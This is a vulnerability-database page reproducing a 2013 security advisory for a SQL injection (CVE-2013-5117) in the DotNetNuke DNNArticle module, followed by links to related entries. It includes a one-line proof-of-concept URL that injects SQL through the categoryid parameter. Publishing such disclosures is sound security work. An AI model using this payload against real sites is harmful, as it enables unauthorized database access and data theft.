Lucene search
Sajjad PouraliPACKETSTORM:122824HistoryAug 14, 2013 - 12:00 a.m.
DotNetNuke DNNArticle 10.0 SQL Injection
2013-08-1400:00:00
Sajjad Pourali
packetstormsecurity.com
32
0.002 Low
EPSS
Percentile
59.2%
`Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/β
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Remote: yes
Authentication required: no
User interaction required: no
Impact: High
Affected:
- DNNArticle 10.0 and earlier
---
PoC:
http://www.vulnerable.com/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
---
+ Sajjad Pourali
+ http://www.securation.com/
+ http://www.cert.um.ac.ir/
+ Contact: sajjad[at]securation.com
`
Related
seebug
seebug
DotNetNuke DNNArticle樑ε'categoryid'εζ°SQL注ε
₯ζΌζ΄
2013-08-27 00:00:00
DotNetNuke DNNArticle Module 10.0 - SQL Injection Vulnerability
2014-07-01 00:00:00
checkpoint_advisories
checkpoint_advisories
DotNetNuke DNNArticle Module SQL Injection (CVE-2013-5117)
2014-11-10 00:00:00
prion
prion
Sql injection
2014-03-12 14:55:00
nessus
nessus
DNN (DotNetNuke) DNNArticle Module categoryid Parameter SQL Injection
2013-08-16 00:00:00
cvelist
cvelist
CVE-2013-5117
2014-03-12 14:00:00
exploitpack
exploitpack
DotNetNuke DNNArticle Module 10.0 - SQL Injection
2013-08-15 00:00:00
cve
cve
CVE-2013-5117
2014-03-12 14:55:30
zdt
zdt
DotNetNuke DNNArticle Module 10.0 - SQL Injection Vulnerability
2013-08-15 00:00:00
openvas
openvas
DotNetNuke < 10.1 DNNArticle Module SQLi Vulnerability
2013-08-19 00:00:00
nvd
nvd
CVE-2013-5117
2014-03-12 14:55:30
exploitdb
exploitdb
DotNetNuke DNNArticle Module 10.0 - SQL Injection
2013-08-15 00:00:00